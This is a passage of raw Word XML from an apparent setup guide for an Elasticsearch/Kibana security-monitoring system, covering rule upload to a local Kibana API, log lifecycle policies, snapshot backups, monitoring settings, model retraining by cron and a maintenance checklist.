      </w:r>
    </w:p>
    <w:p w14:paraId="62A73A74" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Uploads them to Kibana using API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A728B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example: Upload rule via API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288928BF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>curl -X POST "http://localhost:5601/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>detection_engine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>/rules/_import" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECF098" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>kbn-xsrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>: true" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6BC75" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  -H "Content-Type: multipart/form-data" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250881B0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  -F "file=@rules/latest_rules.ndjson"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526404B8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>So, if you update rules in GitHub → system updates automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215E121" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="7B0BCD4F">
          <v:rect id="_x0000_i1119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AAA77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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.5 — Log Rotation and Archiving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AA49F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Your logs will grow fast, so manage storage smartly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A384F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch Index Lifecycle Policy (ILM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBF12A6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>In Kibana → Stack Management → Index Lifecycle Policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B765A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Set policy for your logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37FA8B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> (7 days): searchable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93618B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Warm</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> (30 days): read-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11E112" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> (60+ days): auto-deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF445A3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:lastRenderedPageBreak/>
        <w:t>ILM Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58202660" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="0ED04650">
          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D1880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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.6 — Backup &amp; Restore (Snapshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4851C85B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Set up scheduled backups of your indices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04802D72" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example snapshot policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C0E7C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Create a repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA47AFF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>PUT _snapshot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>elk_backup_repo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="330F5B35" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2AE089" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "type": "fs",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4D144" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "settings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D1450" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">    "location": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>/backup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D12F81" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69185E2C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1B6FE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Create a daily snapshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C361585" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>PUT _snapshot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>elk_backup_repo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>/snapshot_2025_10_08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E49B0F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D5F25" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "indices": "normalized-logs-*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D80055" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20919A51" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-take-snapshot.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CD9DC50" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="67263337">
          <v:rect id="_x0000_i1121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE59619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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.7 — System Health Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBF6EE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elastic Stack Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> to visualize:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCC4A0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>CPU, memory, and storage usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1028DC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Logstash pipeline throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC47C8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Elasticsearch index sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A7E8C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Enable monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5B838" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>xpack.monitoring.enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426923BF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>xpack.monitoring.collection.enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D2356" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Access via Kibana → Stack Monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9188FC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:lastRenderedPageBreak/>
        <w:t>Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/monitor-elasticsearch-cluster.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D411739" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="3F87C21C">
          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="152499EF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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.8 — Retraining on New Data (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38323074" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">If you later integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transformer or ML models</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>, you can retrain them periodically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879A8AE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Export fresh logs (normalized-logs-*) as CSV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49138B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Fine-tune your anomaly detection transformer model (e.g., BERT-based) on benign vs malicious patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FB0EA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Use scheduled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> job to trigger retraining monthly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2A666" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA66309" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>0 2 1 * * /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>/bin/python3 /opt/elk-aptguard/retrain_model.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63320AC9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Retraining script should:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D4BBE8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Fetch new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> logs from Elasticsearch using REST API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29396290" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Fine-tune model (on local or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>Colab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986F965" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Update inference API endpoint (used in alert correlation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A4B51" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="562E930C">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8420A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🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.9 — Maintenance Checklist (Weekly/Monthly)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2933"/>
        <w:gridCol w:w="2416"/>
      </w:tblGrid>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="79EDA5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A246A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952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7273EBD8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0046395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42BA88A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="16080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AAFA0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Daily</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="283060AC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Check alerts dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62F96E44" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Validate real-time rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="5BB9B9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AE564" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Weekly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EDF145B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Review pipeline logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1CB789" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Catch broken parsers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
